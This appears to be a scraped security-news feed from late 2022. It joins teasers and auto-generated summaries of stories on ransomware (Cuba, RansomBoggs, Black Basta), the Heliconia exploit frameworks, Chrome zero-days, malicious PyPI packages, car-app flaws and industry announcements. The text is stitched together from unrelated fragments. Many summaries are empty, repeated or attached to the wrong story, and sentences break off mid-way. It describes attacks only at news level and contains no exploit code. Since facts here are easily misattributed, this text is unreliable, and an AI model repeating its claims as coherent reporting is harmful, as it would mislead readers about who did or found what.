Yuga Labs analysts found that the mobile apps for Acura, BMW, Honda, Hyundai, Infiniti, Jaguar, Land Rover, Lexus, Nissan, Subaru, and Toyota, use SiriusXM technology to implement remote vehicle management features. Security researchers at Yuga Labs found the issues and explored similar attack surfaces in the SiriusXM "smart vehicle" platform used in cars from other makers (Toyota, Honda, FCA, Nissan, Acura, and Infinity) that allowed them to "remotely unlock, start, locate, flash, and honk" them. "ImmuniWeb has launched the new Discovery Phishing Websites Takedown service which takes down malicious and phishing websites in just one click to reduce the risks of surging phishing campaigns that aptly exploit human error. Both the number and success rate of phishing attacks are skyrocketing: 74% of organizations fell victim to successful phishing attacks last year, whilst 54% of the phishing incidents led to a compromise of customer data or other sensitive information. To tackle … More
The post ImmuniWeb launches service for discovery and take down of phishing websites appeared first on Help Net Security.
"Autosummary:
Additionally, all customers of ImmuniWeb Discovery with Dark Web monitoring in their subscription will now have access to malware logs with sensitive data stolen from their compromised devices when the former become accessible on the Dark Web. Given that many companies still encourage working from home, preventing attacks on corporate devices located outside of the office is not an easy task, let alone monitoring personal devices that may also contain sensitive corporate data. "Autosummary:
Variston, which has a bare-bones website, claims to "offer tailor made Information Security Solutions to our customers," "design custom security patches for any kind of proprietary system," and support the "the discovery of digital information by [law enforcement agencies]," among other services. "Autosummary:
"Data breaches can be devastating for organizations, these are 3 of the worst incidents that could have been prevented Data breaches can be devastating for organizations and even entire countries. Eliminating the risk of a data breach is nearly impossible, but some things can be done to reduce it significantly. Here are three of the […]
The post 3 of the Worst Data Breaches in the World That Could Have Been Prevented appeared first on Security Affairs.
"Autosummary:
Here are some of them: Strong encryption Strong password policy for employees Third-party risk management Educate employees about cyber risks About the Author: Anas Baig With a passion for working on disruptive products, Anas Baig is currently working as a Product Lead at the Silicon Valley based company – Securiti.ai. Here are three of the worst data breaches that could have been avoided: Yahoo In 2013, Yahoo suffered one of the worst data breaches in history, exposing over 3 billion user accounts. "Autosummary:
Useful information that could help identify the ransomware gang"s members and the cybercriminals they work with includes "boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. "Autosummary:
Redigo malware functions (AquaSec) AquaSec says it"s likely that the ultimate goal of Redigo is to add the vulnerable server as a bot in a network for distributed denial-of-service (DDoS) attacks or to run cryptocurrency miners on the compromised systems. "Actions to take today to mitigate cyber threats from ransomware:
• Prioritize remediating known exploited vulnerabilities.
• Train users to recognize and report phishing attempts.
• Enable and enforce phishing-resistant multifactor authentication.
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known Cuba ransomware IOCs and TTPs associated with Cuba ransomware actors identified through FBI investigations, third-party reporting, and open-source reporting. This advisory updates the December 2021 FBI Flash: Indicators of Compromise Associated with Cuba Ransomware.
Note: While this ransomware is known by industry as “Cuba ransomware,” there is no indication Cuba ransomware actors have any connection or affiliation with the Republic of Cuba.
Since the release of the December 2021 FBI Flash, the number of U.S. entities compromised by Cuba ransomware has doubled, with ransoms demanded and paid on the increase.
This year, Cuba ransomware actors have added to their TTPs, and third-party and open-source reports have identified "
Autosummary:
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA. Technical Details Mitigations FBI and CISA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Cuba ransomware: Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).REPORTING FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.This year, Cuba ransomware actors have added to their TTPs, and third-party and open-source reports have identified a possible link between Cuba ransomware actors, RomCom Remote Access Trojan (RAT) actors, and Industrial Spy ransomware actors. to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud). with password logins (e.g., service account, admin accounts, and domain admin accounts) with National Institute for Standards and Technology (NIST) standards for developing and managing password policies. "Autosummary:
"Autosummary:
Redigo malware functions (AquaSec) AquaSec says it"s likely that the ultimate goal of Redigo is to add the vulnerable server as a bot in a network for distributed denial-of-service (DDoS) attacks or to run cryptocurrency miners on the compromised systems. "With the rapidly rising energy prices putting a strain on many households, what are some quick wins to help reduce the power consumption of your gadgets?
The post Top tips to save energy used by your electronic devices appeared first on WeLiveSecurity
"Autosummary:
Use laptops, rather than desktop computers, as they use less energy, according to the US government. With inflation starting to hit home and bills on the rise across Europe, consumers in some countries are being asked by their governments to try and cut back on energy use where possible amid fears of power blackouts.Here are some ideas: If you’re on the hunt for new gadgets, look for energy efficient kit by checking for Energy Star accreditation and/or a good rating on the EU’s energy labelling scheme. "Redigo is a new Go-based malware employed in attacks against Redis servers affected by the CVE-2022-0543 vulnerability. Researchers from security firm AquaSec discovered a new Go-based malware that is used in a campaign targeting Redis servers. Threat actors are exploiting a critical vulnerability, tracked as CVE-2022-0543, in Redis (Remote Dictionary Server) servers. Redis (remote dictionary server) […]
The post New Go-based Redigo malware targets Redis servers appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On The attack chain starts with scans for the Redis server exposing port 6379 to the internet, then threat actors attempt to connect and run the following Redis commands: INFO command – this command allows adversaries to receive information about our Redis server. "Autosummary:
"CloudWave acquires Sensato Cybersecurity, bringing together cloud hosting services and managed Cybersecurity-as-a-Service for healthcare organizations. Sensato was founded by long-time health information technology visionary John Gomez, who will join CloudWave as chief security and engineering officer. Sensato developed a fully integrated Cybersecurity-as-a-Service platform (CaaS) that features an innovative solution stack to provide real-time network monitoring, intrusion detection, and asset fingerprinting along with a 24×7 Security Operations Center designed specifically for healthcare infrastructure and connected devices. … More
The post CloudWave acquires Sensato to expand its healthcare cybersecurity portfolio appeared first on Help Net Security.
"Autosummary:
“With the addition of the innovative, proprietary technologies included in the Sensato Cybersecurity suite, along with the cyber expertise of the Sensato team, CloudWave will be able to offer customers the high-level cybersecurity we provide for our cloud-based delivery to on-premises systems.”, Littlejohn continued. "Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington. Not only did ministers criticize the state-owned companies as national security and cybersecurity threats, but they also brought into question their human rights record. This story is not an outlier. From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy … More
The post IoT device origin matters more than ever appeared first on Help Net Security.
"Autosummary:
Recently, British politicians called on the government to crack down on the use of surveillance equipment from two Chinese companies, Hikvision and Dahua, which are already blacklisted by Washington.Powered by smaller, cheaper, and more efficient components, most of this growth comes from Chinese companies.From hard-coded admin passwords to “always-on” cloud features, cheap smart / connected devices with limited privacy or regulatory standards – largely from the Asian superpower – have flooded the market over the past decade. "In this article, we’ll help you: Understand how breaches can stay hidden inside your supply chain Determine if your supplier relationships are increasing your risk Assess your exposure across your entire supply chain The cyber pain in the supply chain A company’s supply chain is like a body’s nervous system: a mesh of interconnected manufacturers, vendors, sub-contractors, service delivery firms, even coding and collaboration tools. The connected enterprise is an efficient enterprise. Provided that the … More
The post How to find hidden data breaches and uncover threats in your supply chain appeared first on Help Net Security.
"Autosummary:
In this article, we’ll help you: Understand how breaches can stay hidden inside your supply chain Determine if your supplier relationships are increasing your risk Assess your exposure across your entire supply chain The cyber pain in the supply chain A company’s supply chain is like a body’s nervous system: a mesh of interconnected manufacturers, vendors, sub-contractors, service delivery firms, even coding and collaboration tools. Why a cybersecurity data breach is not just about your organization Modern business runs on Software-as-a-Service (SaaS), and many of the world’s most successful companies are SaaS vendors, such as Salesforce, Adobe, Shopify, Zoom, or DocuSign. To turn breach information into action, Lab 1 offers Blast, a real-time alerting service; Radius, a detailed breach report, and Fallout, an impact assessment with recommended remedies, and company reports for an aggregated normalised view of risk. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
KmsdBot botnet crash (Akamai) "This malformed command likely crashed all the botnet code that was running on infected machines and talking to the C2 — essentially, killing the botnet," Cashdollar added. "Autosummary:
The financial penalty introduced by the new bill is set to whichever is greater: AU$50 million Three times the value of any benefit obtained through the misuse of information 30% of a company"s adjusted turnover in the relevant period Previously, the penalty for severe data exposures was AU$2.22 million, considered wholly inadequate to incentivize companies to improve their data security mechanisms. "Autosummary:
" The exploitation framework consists of multiple components, each of them targeting specific security flaws in software on the targets" devices: Heliconia Noise: a web framework for deploying a Chrome renderer bug exploit followed by a Chrome sandbox escape to install agents on the targeted device a web framework for deploying a Chrome renderer bug exploit followed by a Chrome sandbox escape to install agents on the targeted device Heliconia Soft: a web framework that deploys a PDF containing the Windows Defender exploit tracked as CVE-2021-42298 a web framework that deploys a PDF containing the Windows Defender exploit tracked as CVE-2021-42298 Heliconia Files: a set of Firefox exploits for Linux and Windows, one tracked as CVE-2022-26485 For Heliconia Noise and Heliconia Soft, the exploits would ultimately deploy an agent named "agent_simple" on the compromised device. "Autosummary:
Cyberattack disrupts Keralty"s operations Over the past few days, Keralty and its subsidiaries, EPS Sanitas and Colsanitas, have suffered disruption to their IT operations, the scheduling of medical appointments, and its websites. "Autosummary:
“Although the vulnerabilities are all related to the authentication, authorization, and transmission implementations, each application’s failure mechanism is different” - Synopsys The flaws impacting each app are the following: CVE-2022-45477 (9.8 severity rating) – "Autosummary:
Dolphin capabilities During the initial stage, Dolphin collects the following information from the infected machine: Username Computer name Local and external IP address Installed security software RAM size and usage Presence of debugging or network packet inspection tools OS version The backdoor also sends to the C2 its current configuration, version number, and time. "Google’s Threat Analysis Group (TAG) linked three exploitation frameworks to a Spanish surveillance spyware vendor named Variston. While tracking the activities of commercial spyware vendors, Threat Analysis Group (TAG) spotted an exploitation framework likely linked Variston IT, a Spanish firm. Officially, Variston claims to provide custom security solutions and custom patches for embedded system. The […]
The post Google links three exploitation frameworks to Spanish commercial spyware vendor Variston appeared first on Security Affairs.
"Autosummary:
Heliconia Noise: a web framework for deploying an exploit for a Chrome renderer bug followed by a sandbox escape a web framework for deploying an exploit for a Chrome renderer bug followed by a sandbox escape Heliconia Soft: a web framework that deploys a PDF containing a Windows Defender exploit a web framework that deploys a PDF containing a Windows Defender exploit Files: a set of Firefox exploits for Linux and Windows. "Autosummary:
Dolphin capabilities During the initial stage, Dolphin collects the following information from the infected machine: Username Computer name Local and external IP address Installed security software RAM size and usage Presence of debugging or network packet inspection tools OS version The backdoor also sends to the C2 its current configuration, version number, and time. "The hype and popularity of the FIFA World Cup has attracted audiences from across the globe. And this, in turn attracts a variety of cybercriminals, who want to exploit the varied fan following, and the organizations participating, to make a quick buck. Advanced persistent threat (APT) campaigns, phishing, credit card/cryptocurrency fraud, DDoS attacks, and identity theft are among the threats faced by organizations and audiences, CloudSEK reports. The cybercriminals are motivated by financial gain, ideology, … More
The post Cybercriminals are cashing in on FIFA World Cup-themed cyberattacks appeared first on Help Net Security.
"Autosummary:
“The gap between the supply and demand of FIFA World Cup game tickets, flight tickets, hotels, souvenirs, etc., has been co-opted by cybercriminals, to defraud fans and enthusiasts. Advanced persistent threat (APT) campaigns, phishing, credit card/cryptocurrency fraud, DDoS attacks, and identity theft are among the threats faced by organizations and audiences, CloudSEK reports. "In this interview with Help net Security, Brad Jones, VP of Information Security at Seagate Technology, talks about cybersecurity trends organizations will be dealing with soon, particlularly concerning cloud misconfiguration, data classification, software vulnerabilities, and the cybersecurity skills gap. Cybersecurity risks are an ever-evolving issue for all organizations. What are the main ones we are going to be dealing with in the near future? There will be a spotlight on cloud misconfiguration. It is already … More
The post The cybersecurity trends organizations will soon be dealing with appeared first on Help Net Security.
"Autosummary:
In this interview with Help net Security, Brad Jones, VP of Information Security at Seagate Technology, talks about cybersecurity trends organizations will be dealing with soon, particlularly concerning cloud misconfiguration, data classification, software vulnerabilities, and the cybersecurity skills gap.As a result, we will see legal departments, security teams, and data owners across other departments work together to classify, manage and protect valuable data.For example, by training security talent to manage automated, cloud-agnostic security tools, companies can better manage security across a multicloud environment. "In this Help Net Security video, Frank Kim, CISO-in-Residence at YL Ventures, discusses the growing role of CISOs in investment firms and how their role as advisors helps drive cybersecurity startups. Frank works closely with cybersecurity startup founders on ideation, product-market-fit, and value realization, on an in-house and regular basis. He provides them with what can be considered an important perspective into the needs of modern CISOs, security teams, and businesses, and he specifically guides … More
The post CISOs in investment firms help fast-track cybersecurity startups appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"A pre-authentication RCE flaw (CVE-2021-35587) in Oracle Access Manager (OAM) that has been fixed in January 2022 is being exploited by attackers in the wild, the Cybersecurity and Infrastructure Security Agency has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog. About CVE-2021-35587 CVE-2021-35587 was discovered by security researchers “Jang” (Nguyen Jang) and “Peterjson” in late 2021 by accident, while “building PoC for another mega-0day.” The vulnerability is in the OpenSSO Agent … More
The post Pre-auth RCE in Oracle Fusion Middleware exploited in the wild (CVE-2021-35587) appeared first on Help Net Security.
"Autosummary:
"In today’s technological world, educating people about cybersecurity awareness is an absolute necessity. According to one report, 82% of data breaches involved the human element, from social attacks to misuse of technologies. These errors are not always entirely preventable, as some level of human error is inevitable, but proper training in cybersecurity awareness can greatly […]
The post Tips for Gamifying Your Cybersecurity Awareness Training Program appeared first on Security Affairs.
"Autosummary:
By leveraging simple concepts of rewards, teamwork, simulations, quizzes, and visual aids, you can give your employees an experience that is more engaging, more entertaining, and more effective than traditional methods.Gamification incentivizes and motivates employees to be more engaged, participate more actively, retain information, and implement behavioral changes moving forward.Visual aids such as graphs, charts, pictures, or videos are a quick and efficient way to convey information that might be harder to understand in text format. "Autosummary:
These actions may include deleting the volume shadow service, disabling the anti-malware service, clearing Windows event viewer logs, creating ransomware notes in multiple directories, and changing the desktop background. Figure 1: The Wazuh dashboard showing the result of an SCA check on a Red Hat Enterprise Linux device File integrity monitoring File integrity monitoring (FIM) is the process of monitoring an endpoint filesystem for addition, deletion, and modification activities. Figure 2: Wazuh integration with YARA to detect a ransomware executable Detection with Wazuh The initial stage of ransomware attacks involves the malware performing several actions on the infected endpoint. Ransomware attack vector Ransomware is spread using different techniques, but the most common way computer systems become infected is through user-initiated actions.In recent cyberattacks, ransomware features have expanded to include data exfiltration, distributed denial of service (DDoS) attacks, and anti-analysis techniques. "The European Council adopted legislation for a high common level of cybersecurity across the Union, to further improve the resilience and incident response capacities of both the public and private sector and the EU as a whole. The new directive, called “NIS2“, will replace the current directive on security of network and information systems (the NIS directive). “There is no doubt that cybersecurity will remain a key challenge for the years to come. The stakes … More
The post EU Council adopts the NIS2 directive appeared first on Help Net Security.
"Autosummary:
Other changes introduced by the new law Moreover, the new directive has been aligned with sector-specific legislation, in particular the regulation on digital operational resilience for the financial sector (DORA) and the directive on the resilience of critical entities (CER), to provide legal clarity and ensure coherence between NIS2 and these acts. "Autosummary:
The stealer code is said to have been embedded in various Python packages such as "tiktok-filter-api," "pyshftuler," "pyiopcs," and "pydesings," with the operators swiftly publishing new replacements to the Python Package Index (PyPI) under different names upon getting removed. "Autosummary:
"CISA added a critical flaw impacting Oracle Fusion Middleware, tracked as CVE-2021-35587, to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) a critical vulnerability impacting Oracle Fusion Middleware, tracked as CVE-2021-35587 (CVSS 3.1 Base Score 9.8), to its Known Exploited Vulnerabilities Catalog. An unauthenticated attacker with network access via HTTP can exploit […]
The post CISA adds Oracle Fusion Middleware flaw to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Files encrypted by Trigona Source: BleepingComputer The ransomware will also embed the encrypted decryption key, the campaign ID, and the victim ID (company name) in the encrypted files. "Batten announced the appointment of Kurt Sanger as a Cybersecurity Expert. As a former Deputy General Counsel with U.S Cyber Command, Sanger brings years of experience and expertise in cybersecurity and has been involved in the planning of many complex cyber operations. Through this role, Sanger often found himself translating and communicating complex technical information between different communities. Sanger also served 23 years in the United States Marine Corps, giving him a unique perspective on … More
The post Kurt Sanger joins Batten as Cybersecurity Expert appeared first on Help Net Security.
"Autosummary:
"In this Help Net Security video, Alex Paquette, COO at Ironscales, discusses the impact in terms of the time and energy required to defend against the never-ending and ever-evolving onslaught of phishing attacks. A recent study conducted by Osterman Research found that IT and security teams spend one-third of their time handling phishing threats every week. 70% of organizations spend 16-60 minutes dealing with a single phishing email message. Almost half of the respondents state … More
The post How the dynamics of phishing attacks are changing appeared first on Help Net Security.
"Autosummary:
"CodeSec CodeSec is a CLI based tool which brings Contrast’s enterprise-level security testing right to your laptop. It allows you to run real-time SAST or Serverless scans and receive actionable results in a matter of minutes. Defendify Essentials Package Assess your cyber risk, test your network, and improve awareness with essential tools from Defendify: Cybersecurity assessments: Assess your cyber strengths, weaknesses, and opportunities for improvement. Vulnerability scanning: Identify and prioritize vulnerabilities in your organization’s external … More
The post 7 free cybersecurity resources you need to bookmark appeared first on Help Net Security.
"Autosummary:
Defendify Essentials Package Assess your cyber risk, test your network, and improve awareness with essential tools from Defendify: Cybersecurity assessments: Assess your cyber strengths, weaknesses, and opportunities for improvement. "Autosummary:
"Autosummary:
"Several Ukrainian organizations were hit by Russia-based RansomBoggs Ransomware in the last week, ESET reports. Researchers from ESET observed multiple attacks involving a new family of ransomware, tracked as RansomBoggs ransomware, against Ukrainian organizations. The security firm first detected the attacks on November 21 and immediately alerted the CERT US. The ransomware is written in […]
The post RansomBoggs Ransomware hit several Ukrainian entities, experts attribute it to Russia appeared first on Security Affairs.
"Autosummary:
A 9/9 — ESET research (@ESETresearch) November 25, 2022 Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, RansomBoggs ransomware) "Autosummary:
"Amazon Web Services (AWS) fixed a cross-tenant vulnerability that could have allowed attackers to gain unauthorized access to resources. Amazon Web Services (AWS) has addressed a cross-tenant confused deputy problem in its platform that could have allowed threat actors to gain unauthorized access to resources. The problem was reported to the company by researchers from […]
The post Experts found a vulnerability in AWS AppSync appeared first on Security Affairs.
"Autosummary:
Linkedin Whatsapp Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Checkmarx analysts discovered that the attackers used multiple Python packages hosted on PyPI, including "tiktok-filter-api", "pyshftuler", "pyiopcs," and "pydesings," with new ones added every time the old packages are reported and removed. "Autosummary:
"ESET researchers spot a new ransomware campaign that goes after Ukrainian organizations and has Sandworm"s fingerprints all over it
The post RansomBoggs: New ransomware targeting Ukraine appeared first on WeLiveSecurity
"Autosummary:
RansomBoggs.A. RansomBoggs at a glance In the ransom note seen above (SullivanDecryptsYourFiles.txt), the authors of RansomBoggs make multiple references to the Monsters Inc. movie, including by impersonating James P. Sullivan, the movie’s main protagonist. "Autosummary:
"Autosummary:
Belgian lawyer and privacy activist Matthias Dobbelaere-Welvaert told BleepingComputer that exposed individuals should change everything they can, including license plates, identity cards, passports, etc. "You can"t easily change where you live, but even if you change all documents, the repercussions of this security incident could be for a lifetime, and theft identity is no joke," says Dobbelaere-Welvaert. "Check Point has launched its CyberUp program, an initiative that will support Israel’s growing network of cybersecurity start-ups by opening up market opportunities with its customers and providing access to potential investors. As well as guiding successful participants through the crucial stages of growth, CyberUp will in turn give Check Point customers access to Israeli innovation. Unlike other start-up programs, CyberUp is focused solely on the cybersecurity sector. Candidates are carefully selected, vetted, and chosen … More
The post Check Point launches CyberUp program to support Israel’s growing network of cybersecurity start-ups appeared first on Help Net Security.
"Autosummary:
These are Cyberpion, Grip Security, Infinipoint, Reflectiz, Sentra, Suridata and Zero Networks. "The cyber game is now an entire underground economy wrapped around cyberattacks. Thanks to increased international friction and the activity of groups such as Lapsus$, cybercriminals have upped the ante on cybercrime in order to turn a profit. Atakama outlines its top cybersecurity predictions for 2023. IoT blends with shadow IT to make a security headache With 43 billion devices connected to the internet in 2023, attackers have no shortage of targets. Although IoT devices … More
The post 5 cybersecurity predictions for 2023 appeared first on Help Net Security.
"Autosummary:
In response, organizations will need to look beyond conventional data protection practices toward technologies that protect data at the source, such as multifactor encryption to render files useless to threat-actors who will not be able to access the data, whether it is still inside the security perimeter or successfully exfiltrated.Double extortion attacks, pack an even greater punch by encrypting sensitive and proprietary data, hold it for ransom, and worse, publish the data on the dark web unless organizations cough up the cash. "Autosummary:
Chrome updated to the latest version Chrome"s eighth zero-day fix in 2022 Chrome version 107.0.5304.121/122 fixes the eighth actively exploited zero-day vulnerability this year, indicating the high interest of attackers against the widely used browser. "A school’s ecosystem is far different from that of the typical enterprise. Not only does a school district face the monumental task of educating our upcoming generations, but they must do it at the scale of a Fortune 500 enterprise with a fraction of the budget! With ransomware attacks rising, administrators must find ways to prevent their schools from becoming the next victim, while preserving the integrity of the learning process. Furthermore, unlike companies who … More
The post Overcoming unique cybersecurity challenges in schools appeared first on Help Net Security.
"Autosummary:
Unfortunately, students and staff often make themselves vulnerable through the re-use of passwords across dozens of platforms, devices, websites, and applications within the school.Remote learning, cloud-based tools, smartphones, laptops, and countless other devices have wiped away any perimeter for schools and the sensitive information that they house. "Autosummary:
"The British government banned the installation of Chinese-linked security cameras at sensitive facilities due to security risks. Reuters reports that the British government ordered its departments to stop installing Chinese security cameras at sensitive buildings due to security risks. The Government has ordered departments to disconnect the camera from core networks and to consider removing […]
The post UK urges to disconnect Chinese security cameras in government buildings appeared first on Security Affairs.
"Autosummary:
"Autosummary:
"Google on Thursday released security updates to address a new zero-day vulnerability, tracked as CVE-2022-4135, impacting the Chrome web browser. Google rolled out an emergency security update for the desktop version of the Chrome web browser to address a new zero-day vulnerability, tracked as CVE-2022-4135, that is actively exploited. The CVE-2022-4135 vulnerability is a heap […]
The post Google fixed the eighth actively exploited #Chrome #zeroday this year appeared first on Security Affairs.
"Autosummary:
CVE-2022-2856 (August 17) – Insufficient validation of untrusted input in Intents CVE-2022-2294 (July 4) – Heap buffer overflow in the Web Real-Time Communications (WebRTC) component CVE-2022-1364 (April 14) – type confusion issue that resides in the V8 JavaScript engine CVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engine CVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component. "Autosummary:
Once pushed across a victim"s network, RansomBoggs encrypts files using AES-256 in CBC mode using a random key (randomly generated, RSA encrypted, and written to aes.bin), and it appends a .chsch extension to all encrypted files extension. "Autosummary:
However, voicemail, network printing, VPN access, network and intranet shared drives are all unavailable, while a range of online application and registration portals are also offline. "Although companies are spending billions on preventative security measures, attacks are a common occurrence. Business continuity requires enterprises to go beyond prevention and prioritize a strategic recovery plan. In this Help Net Security video, Matt Davidson, CTO at Workspot, discusses how cloud PCs are serving as a modern insurance plan for business recovery, enabling safe access for employees from anywhere in the world at a moment’s notice while IT leaders investigate and mitigate the damage.
The post How cloud PCs act as an insurance plan for ransomware recovery appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The dropper apps, now taken down, are below - X-File Manager (com.victorsoftice.llc) - 10,000+ downloads FileVoyager (com.potsepko9.FileManagerApp) - 5,000+ downloads LiteCleaner M (com.ltdevelopergroups.litecleaner.m) - 1,000+ downloads LiteCleaner M is still available for download from a third-party app store called Apksos, which also houses a fourth SharkBot artifact by the name "Phone AID, Cleaner, Booster" (com.sidalistudio.developer.app). "Autosummary:
"Researchers warn of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. Experts at the Cybereason Global SOC (GSOC) team have observed a surge in Qakbot infections as part of an ongoing aggressive Qakbot malware campaign that leads to Black Basta ransomware infections in the US. In the last two […]
The post An aggressive malware campaign targets US-based companies with Qakbot to deliver Black Basta Ransomware appeared first on Security Affairs.
"Autosummary:
QakBot, also known as QBot or Pinkslipbot, is a banking trojan primarily used to steal victims’ financial data, including browser information, keystrokes, and credentials.” "Microsoft reported that hackers have exploited flaws in a now-discontinued web server called Boa in attacks against critical industries. Microsoft experts believe that threat actors behind a malicious campaign aimed at Indian critical infrastructure earlier this year have exploited security flaws in a now-discontinued web server called Boa. The Boa web server is widely used across a […]
The post Threat actors exploit discontinues Boa web servers to target critical infrastructure appeared first on Security Affairs.
"Autosummary:
“Investigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. "Autosummary:
" When the victim tried to withdraw some of the fake profits, totaling over $7 million per the fake in-app alerts, the scammers asked for additional payments of "taxes," "fees," and "security deposits" to prove they were "not involved in any illegal behavior. "Autosummary:
"Autosummary:
Join the likes of Intel, Yahoo, and Sixt who levelled up their security with Intigriti to enjoy higher quality bug bounty reports, faster lead times, and an intuitive platform. "Autosummary:
" The types of cybercrimes that generated the said amount include romance scams, voice phishing, sextortion, investment fraud, and money laundering associated with illegal online gambling. "Autosummary:
Scammers paid a subscription to a service called iSpoof.cc that allowed them to disguise their phone number so they appeared to be calling from major banks including Barclays, NatWest, HSBC, Santander, Lloyds, First Direct, Nationwide, Halifax, and TSB. "RansomExx ransomware is the last ransomware in order of time to have a version totally written in the Rust programming language. The operators of the RansomExx ransomware (aka Defray777 and Ransom X) have developed a new variant of their malware, tracked as RansomExx2, that was ported into the Rust programming language. The move follows the […]
The post RansomExx Ransomware upgrades to Rust programming language appeared first on Security Affairs.
"Autosummary:
The move follows the decision of other ransomware gangs, like Hive, Blackcat, and Luna, of rewriting their ransomware into Rust programming language. "It pays not to let your guard down during the shopping bonanza – watch out for some of the most common scams doing the rounds this holiday shopping season
The post 10 tips to avoid Black Friday and Cyber Monday scams appeared first on WeLiveSecurity
"Autosummary:
So, you needn’t be paranoid, but definitely be wary of too-good-to-be-true offers, and be aware that the more technology we use and the more our reliance on all things online grows, the more likely we may be to fall victim.Also, do not make payments by bank transfer, but request to use other payment methods, such as PayPal, that offer reimbursements to buyers who don’t get what they paid for.The trouble is, clicking the link in the email or text so that you can supposedly claim your gift card will install malware, cause you to lose your personal data, or you end up with a stolen card.The trouble is, clicking the link in the email or text so that you can supposedly claim your gift card will install malware, cause you to lose your personal data, or you end up with a stolen card. "Autosummary:
We have also dumped all of your documents relating to accounting, administration, legal, HR, NDA, SQL, passwords and more! "Sonrai Security releases Risk Insights Engine which lets developer and security teams control the chaos in both their organizations and their multicloud environments, minimizing lateral movement that leads to data theft. Having already given customers comprehensive visibility into and control over every identity and the data each has access to in their multicloud environments, Sonrai now lets teams apply platform-recommended remediations to existing lateral movement risks, benchmark their performance against self-defined goals and similar organizations, … More
The post Sonrai Risk Insights Engine empowers security teams to reduce impact of exploits appeared first on Help Net Security.
"Autosummary:
The platform recommends goals based on multiple factors, including the intended use of an environment (development, staging, production, etc.), presence of sensitive data (e.g., PII), and the maturity of the team responsible for it. "Malwarebytes partners with Stellar Cyber to help resource-constrained teams produce consistent security outcomes across all environments; on-premises, cloud and anything in between. The partnership comes at a critical time in the cybersecurity landscape, as security products become more complex and IT teams spend more time maintaining their security controls, instead of investigating and mitigating cyber threats. According to a 2020 report from Palo Alto Networks, only 46 percent of security operations decision makers are satisfied … More
The post Malwarebytes collaborates with Stellar Cyber to increase productivity and efficiency of security teams appeared first on Help Net Security.
"Autosummary:
"OneTrust is partnering with the Ethics & Compliance Initiative (ECI), the global non-profit organization that empowers organizations to build and sustain cultures of integrity. The partnership enables OneTrust to offer its customers the ECI High-Quality Ethics & Compliance Program (HQP) Assessment tool, which helps organizations evaluate their ethics and compliance programs and determine their level of maturity. ECI has led the effort for organizations to identify and adopt high-quality ethics and compliance programs for many … More
The post OneTrust partners with ECI to help companies evaluate their ethics and compliance programs appeared first on Help Net Security.
"Autosummary:
The OneTrust Ethics and Compliance Cloud brings together ethics program management, speak-up culture assurance, and third-party due diligence to unify people, processes, and technology across ethics, compliance, HR, and legal teams. "Autosummary:
"Autosummary:
Passwords stolen: 50,352,518 (up by 80%) Cookie files exfiltrated: 2,117,626,523 (up by 74%) Crypto wallets breached: 113,204 (up by 216%) Payment cards compromised: 103,150 (up by 81%) Infostealer operation stats from first seven months of 2022 (Group-IB) Group-IB also notes that in the first seven months of this year the actors focused on stealing of Steam, Epic Games, and Roblox accounts, recording a five-fold increase compared to last year. "Autosummary:
Some of the high-severity bugs affecting Boa include CVE-2017-9833 and CVE-2021-33558, which, if successfully exploited, could enable malicious hacking groups to read arbitrary files, obtain sensitive information, and achieve remote code execution. "A vulnerability in popular remote access service/platform ConnectWise Control could have been leveraged by scammers to make compromising targets’ computers easier, Guardio researchers have discovered. By abusing the fully-featured 14-day trial option for that hosted cloud service, scammers are already taking advantage of the platform at no cost, but the vulnerability could have allowed them to remove an alert that can break the illusion the scammers are trying to create. What is ConnectWise Control? ConnectWise … More
The post A flaw in ConnectWise Control spurred the company to make life harder for scammers appeared first on Help Net Security.
"Autosummary:
“For a scammer, all left is to call the victims and manipulate them as if they have some computer technical issue, or alternatively as in our example — send them a fake invoice for some service they never registered to and wait for them to go to the fake refund service portal and enter the ‘invoice’ code (triggering the dedicated RAT installation),” the researchers explained. "Autosummary:
A majority of the victims are located in the U.S., followed by Brazil, India, Germany, Indonesia, the Philippines, France, Turkey, Vietnam, and Italy. "Autosummary:
